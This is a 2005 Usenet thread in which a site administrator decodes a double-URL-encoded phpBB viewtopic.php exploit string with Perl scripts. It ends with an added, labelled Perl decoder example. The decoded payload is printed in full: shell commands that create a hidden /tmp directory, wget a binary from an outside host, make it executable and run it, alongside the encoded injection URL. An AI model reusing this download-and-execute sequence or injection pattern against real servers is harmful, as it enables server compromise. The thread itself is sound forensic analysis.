
Re: (OT) Understanding phpbb hack.



David Dorward wrote:
On Tue, 25 Jan 2005 19:16:14 +0800, Franki <franki@htmlfixit.com> wrote:

A client of mine was hacked using a phpbb exploit.

%2527%252esystem(chr(101)


Does anyone know of a perl script or something that can convert this
back to a string of human readable shell commands??


It's double URL encoded with a bunch of decimal chr commands, this
should get you started:

#!/usr/bin/perl
use strict;
use warnings;

my $string = "viewtopic.php?t=509&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)+%252echr(111)%252echr(32";

$string =~ s/%([0-9A-Fa-f]{2})/chr(hex($1))/eg; # Deurlencode
$string =~ s/%([0-9A-Fa-f]{2})/chr(hex($1))/eg; # Twice
$string =~ s/chr\((\d*)\)/chr($1)/eg; # Convert chr commands to their output

print $string , "\n";




Thanks for that David,

After posting the email, one of my 200 Google searches paid off, and I found this little snippet:

perl -e 'while (<>) { chomp ($t .= $_) }; print "\nString:\n";
while ($t =~ /chr\((\d+)\)/) {  print chr $1; $t =~ s/chr\($1\)//; }'

Running it on the url string in question translated to:
echo uncomeco;
mkdir /tmp/.help;
wget -O /tmp/.help/help http://www.angelfire.com/dc2/uncanny5/help;
cd /tmp/.help;
chmod +x help;
./help;
echo unfim

So apparently they installed a binary called "help" into the temp dir and made it executable.

Your script gave much the same translation, except yours looked like this:
viewtopic.php?t=509&highlight='.system(e.c.h.o. .u%2 en.c.o.m.e.c.o.;.m.k .d.i.r. ./.t.m.p./.. .h.e.l.p. .;. .w.g.e .t. .-.O. ./.t.m.p./%2 e..h.e.l.p./.h.e.l.p . .h.t.t.p.:././.w.w .w...a.n.g.e.l.f.i.r .e...c.o.m./.d.c.2./ .u.n.c.a.n.n.y.5./.h .e.l.p. .;. .c.d. ./ .t.m.p./...h.e.l.p. .;. .c.h.m.o.d. .+.x . .h.e.l.p. .;. .../ .h.e.l.p.;.e.c.h.o. .u.n.f.i.m).'

:-)

Anyone know what the echo commands achieve? echo uncomeco; and echo unfim.

Thanks again

Rgds


Franki
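
Added example, not part of the original messages: a Perl sketch that combines the two approaches from the thread. It URL-decodes until the string stops changing, then folds each chr(N).chr(N) chain into one quoted string, so the PHP "." concatenation operators that appear as dots in the output above drop out. The sample request is constructed from the fragment quoted in the thread and spells only "echo uncomeco"; the sub names and the five-pass cap are assumptions.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Constructed sample in the shape of the request quoted in this thread;
# the chr() chain spells only "echo uncomeco".
my $sample = 'viewtopic.php?t=509&highlight=%2527%252esystem('
    . 'chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)'
    . '%252echr(117)%252echr(110)%252echr(99)%252echr(111)'
    . '%252echr(109)%252echr(101)%252echr(99)%252echr(111))%252e%2527';

# Undo URL encoding until the string stops changing (the thread's sample
# needs two passes). Returns the decoded string and the pass count.
sub url_decode_layers {
    my ($s, $max) = @_;
    $max //= 5;    # assumed cap so the loop always terminates
    my $passes = 0;
    while ($passes < $max) {
        (my $next = $s) =~ s/%([0-9A-Fa-f]{2})/chr(hex($1))/eg;
        last if $next eq $s;
        $s = $next;
        $passes++;
    }
    return ($s, $passes);
}

# Turn one chr(N).chr(N)... chain into a quoted, printable literal.
sub render_chain {
    my ($chain) = @_;
    my $text = join '', map { chr($_) } $chain =~ /chr\(\s*(\d{1,3})\s*\)/g;
    $text =~ s/([^\x20-\x7e])/sprintf('\\x%02x', ord($1))/ge;    # escape non-printables
    return qq{"$text"};
}

# Collapse every chain, dropping the "." operators (and any stray
# whitespace or "+") that sit between consecutive chr() calls.
sub fold_chr_chain {
    my ($s) = @_;
    $s =~ s/(chr\(\s*\d{1,3}\s*\)(?:[\s.+]*chr\(\s*\d{1,3}\s*\))*)/render_chain($1)/ge;
    return $s;
}

my ($decoded, $passes) = url_decode_layers($sample);
print "URL-decoding passes: $passes\n";
print "Decoded:  $decoded\n";
print "Readable: ", fold_chr_chain($decoded), "\n";
```

The pass count is printed separately because a request that needs more than one decoding pass is a useful thing to flag when reviewing access logs.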








